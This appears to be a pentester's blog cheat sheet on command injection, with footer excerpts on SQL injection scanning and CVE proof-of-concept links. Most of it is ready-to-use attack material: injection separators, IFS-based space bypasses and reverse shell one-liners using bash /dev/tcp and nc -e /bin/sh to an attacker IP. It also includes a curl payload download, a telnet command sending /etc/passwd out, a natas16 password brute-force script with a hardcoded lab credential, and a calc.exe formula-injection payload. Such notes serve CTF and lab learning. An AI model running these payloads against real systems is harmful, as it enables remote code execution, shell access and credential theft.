Skip to main content

Command Injection - Code Execution


Try to add the below symbols or statements to bypass and execute req commands

1) & whoami;
2) ; whoami;
3) space c /etc/passwd #if gerp is being used this might work
4) $(whoami)
5) $(base64 -d <<< YQo=)
Bypassing Spaces in bash

#replace spaces with what ever you store in IFS
bash;IFS=_;com='ls_-la';$com
or
bash;IFS=_,;com='ls,-la';$com

bash;IFS=_;com='bash_-i_>&_/dev/tcp/127.0.0.1/9001_0>&1';$com
bash;IFS=_;com='curl_http://172.17.0.1:8000/nc_-o_/dev/shm/nc';$com
bash;IFS=_;com='chmod_+x_/dev/shm/rev.sh';$com
import requests  
from requests.auth import HTTPBasicAuth

auth=HTTPBasicAuth('natas16', 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh')

filteredchars = ''
passwd = ''
allchars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'
for char in allchars:
r = requests.get('http://natas16.natas.labs.overthewire.org/?needle=doomed$(grep ' + char + ' /etc/natas_webpass/natas17)', auth=auth)

if 'doomed' not in r.text:
filteredchars = filteredchars + char
print(filteredchars)

for i in range(32):
for char in filteredchars:
r = requests.get('http://natas16.natas.labs.overthewire.org/?needle=doomed$(grep ^' + passwd + char + ' /etc/natas_webpass/natas17)', auth=auth)

if 'doomed' not in r.text:
passwd = passwd + char
print(passwd)
break


code taken from https://www.abatchy.com/2016/11/natas-level-16
 
 
Low security
type ping or anything in the input box --> 192.168.0.1;pwd --> for linux

remote code execution using netcat

--> nc -vv -l -p 8080   in kali terminal
--> 192.168.0.1; nc -e /bin/sh attacker_IP 8080  --> 192.168.0.1;nc -e /bin/sh 192.168.0.22 8080

then it gets connected to the target website server; enter any linux command in the kali terminal; it works

-----------------------------------------------------------------------------------------------------------
===================================== MEDIUM SECURITY===========================================

--> nc -vv -l -p 8080   in kali terminal
--> 192.168.0.1 | nc -e /bin/sh attacker_IP 8080  --> 192.168.0.1 | nc -e /bin/sh 192.168.0.22 8080


telnet 127.0.0.1 12345 < /etc/passwd


Formula Injection
*=cmd | "/c calc.exe"!z

Comments

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds...

Host and Application locally and access it over the internet via ngrock

 ngrock creates a tunnel from your local machine to ngrock server and host it on the internet via their HTTPS url  Resister an account on ngrock and login #Download the client curl -sSL https://ngrok-agent.s3.amazonaws.com/ngrok.asc \ | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \ && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \ | sudo tee /etc/apt/sources.list.d/ngrok.list \ && sudo apt update \ && sudo apt install ngrok #add the authToken ngrok config add-authtoken 2p7Oc #start a python server on your application python -m http.server 3000 #start the server - use the same port as the python server (3000 in below example) ngrok http http://localhost:3000 --request-header-add "ngrok-skip-browser-warning: true" Setting up a Request Header - Login to the application --> Univeral Gateway --> Edges - Create an Edge --> Request Headers --> `ngrok-skip-browser-warning :12 - go back to overv...

POC Links for CVE's

  Serach for a CVE here first - Trickest/cve Apache CVE-2024-38475 - CVE-2024-38475 #version less than 2.4.51 CVE-2021-44790 - h ttps://www.exploit-db.com/exploits/51193 #Apache HTTP Server 2.4.50 CVE-2021-42013 - https://www.exploit-db.com/exploits/50406 use https://github.com/mrmtwoj/apache-vulnerability-testing for below CVE's CVE-2024-38472: Apache HTTP Server on Windows UNC SSRF CVE-2024-39573: mod_rewrite proxy handler substitution CVE-2024-38477: Crash resulting in Denial of Service in mod_proxy CVE-2024-38476: Exploitable backend application output causing internal redirects CVE-2024-38475: mod_rewrite weakness with filesystem path matching CVE-2024-38474: Weakness with encoded question marks in backreferences CVE-2024-38473: mod_proxy proxy encoding problem CVE-2023-38709: HTTP response splitting EXIM #suppodily should work for versions below Exim 4.96.1 - is not accurate CVE-2023-42115 - https://github.com/AdaHop-Cyber-Security/Pocy/tree/main